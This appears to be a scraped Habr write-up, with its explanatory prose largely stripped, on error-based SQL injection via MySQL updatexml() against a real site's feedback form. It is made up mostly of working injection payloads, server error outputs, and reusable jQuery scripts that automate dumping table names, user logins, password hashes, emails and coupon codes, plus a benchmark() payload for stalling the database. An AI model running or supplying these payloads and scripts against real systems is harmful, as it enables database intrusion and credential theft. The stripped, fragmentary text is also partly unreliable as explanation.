Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; at line 1 SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0', '1', '0', '2015-08-04 11:36:37', '', 'Max', '< >@gmail.com', '', ', '<>@B.ru' .', '', '2015-08-04 11:36:37', '0000-00-00 00:00:00', '0');
UpdateXML (xml_target, xpath_expr, new_xml)
mysql> select updatexml(1, '123', 0) from dual; +------------------------+ | updatexml(1, '123', 0) | +------------------------+ | NULL | +------------------------+ 1 row in set (0,00 sec) mysql> select updatexml(1, '~123', 0) from dual; ERROR 1105 (HY000): XPATH syntax error: '~123'
message' or updatexml(1,concat(0x7e,(version())),0) or '', '0000-00-00 00:00:00', '0000-00-00 00:00:00', '1');--'
' or updatexml(1,concat(0x7e,(version())),0) or '
Error displaying the error page: Application Instantiation Error: XPATH syntax error: '~5.5.41-MariaDB-log' SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0', '1', '0', '2015-08-04 12:39:12', '', 'Ken', 'ken@mailinator.com', '', '' or updatexml(1,concat(0x7e,(version())),0) or '', '', '2015-08-04 12:39:12', '0000-00-00 00:00:00', '0');
version: 5.5.41-MariaDB-log hostname: db-www user: A@ABru database: A
' or updatexml(0, concat(0x7e,(SELECT password FROM mysql.user WHERE user='root')), 0) or '
Error displaying the error page: Application Instantiation Error: SELECT command denied to user 'A'@'ABru' for table 'user' SQL=INSERT INTO ab_com_feedback (`id`, `ordering`, `state`, `checked_out`, `checked_out_time`, `created_by`, `name`, `email`, `phone`, `ask`, `answer`, `createdate`, `changedate`, `userans`) VALUES (NULL, '0', '1', '0', '2015-08-04 14:27:21', '', 'Ken', 'ken@mailinator.com', '', '' or updatexml(0, concat(0x7e,(SELECT password FROM mysql.user WHERE user='root')), 0) or '', '', '2015-08-04 14:27:21', '0000-00-00 00:00:00', '0');
' or updatexml(0, concat(0x7e,(SELECT concat(table_schema, ':', table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0, 1)), 0) or '
aa:cart aa:category aa:includes aa:items aa:layout aa:menu aa:aabb_ak_profiles aa:aabb_ak_stats aa:aabb_ak_storage aa:aabb_assets aa:aabb_associations aa:aabb_banner_clients aa:aabb_banner_tracks aa:aabb_banners aa:aabb_categories aa:aabb_com_feedback aa:aabb_com_photo_votes aa:aabb_com_photo_votes_comment aa:aabb_com_photo_votes_likes aa:aabb_com_wishlist
$.getScript('https://raw.githubusercontent.com/caolan/async/master/lib/async.js'); (function() { var ans_start = " '~", // ans_stop = "' SQL=", // lim = 20, start_from = 0; // AJAX- async.times(lim, function(i, next) { var injection = "' or updatexml(0, concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit "+ (start_from + i) +", 1)), 0) or '"; $.ajax({ url: '/feedback/post.php', method: 'POST', data: $.param({ data_email: 'undefined', data_email_body: 'undefined', data_email_subject: 'A B', type: 'feedback', name: 'Test', mail: 'test@mailinator.com', phone: '', feedbacktext: injection, else: '', recipient: 'A@B.ru', btn: '' }), success: function(resp) { next(null, resp.substring(resp.indexOf(ans_start) + ans_start.length, resp.indexOf(ans_stop))); }, error: function(jqXHR, textStatus) { next(textStatus); } }); }, function(err, results) { // if (err) return console.error(err); window.INJ_RESULTS = results; // , , - - console.log(results.join('\n')); // }); })();
aa:cart aa:category <...> aa:aabb_finder_links aa:aabb_finder_links_terms0 aa:aabb_finder_links_terms1 <...> aa:aabb_jcomments_votes aa:aabb_jsecurelog aa:aabb_jshopping_addons <...> aa:aabb_jshopping_coupons <...> aa:aabb_jshopping_shipping_meth <...> aa:aabb_jshopping_usergroups aa:aabb_jshopping_users <...> aa:aabb_usergroups aa:aabb_users aa:aabb_viewlevels aa:aabb_weblinks aa:aabb_wf_profiles aa:aabb_xmap_items aa:aabb_xmap_sitemap aa:modules aa:orders aa:oshibka aa:params aa:reviews aa:slideshow aa:users
' or updatexml(0, concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1)), 0) or '
id, login, password, email, tel, name, firma, active, date, role
' or updatexml(0, concat(0x7e,(SELECT CONCAT_WS(':',id,login,password) FROM users LIMIT 0,1)), 0) or '
$.getScript('https://raw.githubusercontent.com/caolan/async/master/lib/async.js'); // , var ANS_START = " '~", ANS_STOP = "' SQL=", ANS_ERR = "Er", ANS_LIM = 31; // // start_from lim // construct_req - , function ajax93t411(start_from, lim, construct_req) { // start_from = start_from || 0; lim = lim || 1; // . i, offset - construct_req function req(i, offset, callback) { $.ajax({ url: '/feedback/post.php', method: 'POST', data: $.param({ data_email: 'undefined', data_email_body: 'undefined', data_email_subject: 'A B', type: 'feedback', name: 'Test', mail: 'test@mailinator.com', phone: '', feedbacktext: construct_req(start_from, i, offset), else: '', recipient: 'A@B.ru', btn: '' }), success: function(resp) { callback(null, resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP))); }, error: function(jqXHR, textStatus) { callback(textStatus); } }); } // 31, // , function constructReq(i, full_answer, offset, next) { req(i, offset, function(err, answer) { if (err) return next(err, full_answer); full_answer += answer; if (answer.length == ANS_LIM) { constructReq(i, full_answer, offset + ANS_LIM, next); } else { next(null, full_answer); } }); } // async.timesSeries(lim, function(i, next) { constructReq(i, '', 1, next); }, function(err, results) { if (err) return console.error(err); window.INJ_RESULTS = results; console.log(results.join(', ')); }); }
function inj(start_from, i, offset) { return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',id,login,password,email), "+ offset +", "+ ANS_LIM +") FROM users LIMIT "+ (start_from + i) +",1)), 0) or '" } ajax93t411(0, 30, inj)
function inj(start_from, i, offset) { return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',username,email,password), "+ offset +", "+ ANS_LIM +") FROM aabb_users LIMIT "+ (start_from + i) +",1)), 0) or '" } ajax93t411(0, 30, inj)
function inj(start_from, i, offset) { return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',coupon_code,coupon_value,coupon_start_date,coupon_expire_date), "+ offset +", "+ ANS_LIM +") FROM aabb_jshopping_coupons LIMIT "+ (start_from + i) +",1)), 0) or '" } ajax93t411(0, 30, inj)
function inj(start_from, i, offset) { return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':', table_schema, table_name), "+ offset +", "+ ANS_LIM +") FROM information_schema.tables LIMIT "+ (start_from + i) +", 1)), 0) or '" } ajax93t411(62, 100, inj); // 62 - information_schema ajax93t411(162, 100, inj);
mysql> create database test; Query OK, 1 row affected (0,06 sec) mysql> create table t(id int, msg text); Query OK, 0 rows affected (0,70 sec) mysql> insert into t values (1, 'msg'); Query OK, 1 row affected (0,06 sec) mysql> select * from t; +------+------+ | id | msg | +------+------+ | 1 | msg | +------+------+ 1 row in set (0,00 sec)
mysql> insert into t values (1, '' or updatexml(1, concat('~', version()), 0) or ''); ERROR 1105 (HY000): XPATH syntax error: '~5.6.25-0ubuntu0.15.04.1' mysql> insert into t values (1, '' or updatexml(1, concat('~', '1234567890123456789012345678901234567890'), 0) or ''); ERROR 1105 (HY000): XPATH syntax error: '~1234567890123456789012345678901'
mysql> select 1 from dual into outfile 'test.txt'; Query OK, 1 row affected (0,00 sec) $ sudo ls -la /var/lib/mysql/test/ 124 drwx------ 2 mysql mysql 4096 . 11 18:07 . drwx------ 12 mysql mysql 4096 . 11 17:50 .. -rw-rw---- 1 mysql mysql 65 . 11 17:50 db.opt -rw-rw-rw- 1 mysql mysql 2 . 11 18:07 test.txt -rw-rw---- 1 mysql mysql 8584 . 11 17:52 t.frm -rw-rw---- 1 mysql mysql 98304 . 11 17:52 t.ibd mysql> insert into t values (1, '' or updatexml(1, concat('~', (select 1 from dual into outfile 'test.txt')), 0) or ''); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile 'test.txt')), 0) or '')' at line 1
mysql> LOAD DATA INFILE 'test.txt' into table t; Query OK, 1 row affected, 1 warning (0,08 sec) Records: 1 Deleted: 0 Skipped: 0 Warnings: 1 mysql> select * from t; +------+------+ | id | msg | +------+------+ | 1 | msg | | 1 | NULL | +------+------+ 2 rows in set (0,00 sec)
mysql> insert into t values (1, '' or updatexml(1, concat('~', (LOAD DATA INFILE 'test.txt' into table t)), 0) or ''); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD DATA INFILE 'test.txt' into table t)), 0) or '')' at line 1 mysql> insert into t values (1, '' or updatexml(1, concat('~', (LOAD DATA INFILE 'test.txt')), 0) or ''); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD DATA INFILE 'test.txt')), 0) or '')' at line 1
var ANS_START = " '~", ANS_STOP = "' SQL=", ANS_LIM = 31; function ajax93t411(start_from, lim, construct_req) { start_from = start_from || 0; lim = lim || 1; // Can be -1. -1 if for "while no Err" function req(i, offset, callback) { $.ajax({ //-- All this params is for customization. Feel free url: '/feedback/post.php', method: 'POST', data: $.param({ data_email: 'undefined', data_email_body: 'undefined', data_email_subject: 'A B', type: 'feedback', name: 'Test', mail: 'test@mailinator.com', phone: '', feedbacktext: construct_req(start_from, i, offset), // Don't forget about this function to include else: '', recipient: 'A@B.ru', btn: '' } //--- ), success: function(resp) { var answer = resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP)); if (answer == ANS_ERR) { callback(answer); } else { callback(null, answer); } }, error: function(jqXHR, textStatus) { callback(textStatus); } }); } function constructReq(i, full_answer, offset, next) { req(i, offset, function(err, answer) { if (err) return next(err, full_answer); full_answer += answer; if (answer.length > 0) { constructReq(i, full_answer, offset + answer.length, next); } else { $('body').append('<p>'+ full_answer +'</p>'); // Include each new result into webpage of target site. Just for usability. next(null, full_answer); } }); } function timesSeries(lim, i, results, callback) { if (i < lim) { constructReq(i, '', 1, function(err, answer) { if (err) return callback(err, results); results.push(answer); timesSeries(lim, i + 1, results, callback); }); } else { callback(null, results); } } function untilErrSeries(i, results, callback) { constructReq(i, '', 1, function(err, answer) { if (err) return callback(err, results); results.push(answer); untilErrSeries(i + 1, results, callback); }); } function complete(err, results) { if (err) console.error(err); window.INJ_RESULTS = results; // Keep all results into the global variable. Just for usability. console.log('Done'); } $('body').append('<p><b>New Request!</b></p>'); if (lim > 0) { timesSeries(lim, 0, [], complete); } else { // lim < 0 untilErrSeries(0, [], complete); } }
' or updatexml(0, concat(0x7e,(select benchmark(10000000000000000000000000000000000000000000000, encode('hello', 'world')))), 0) or '
Source: https://habr.com/ru/post/264579/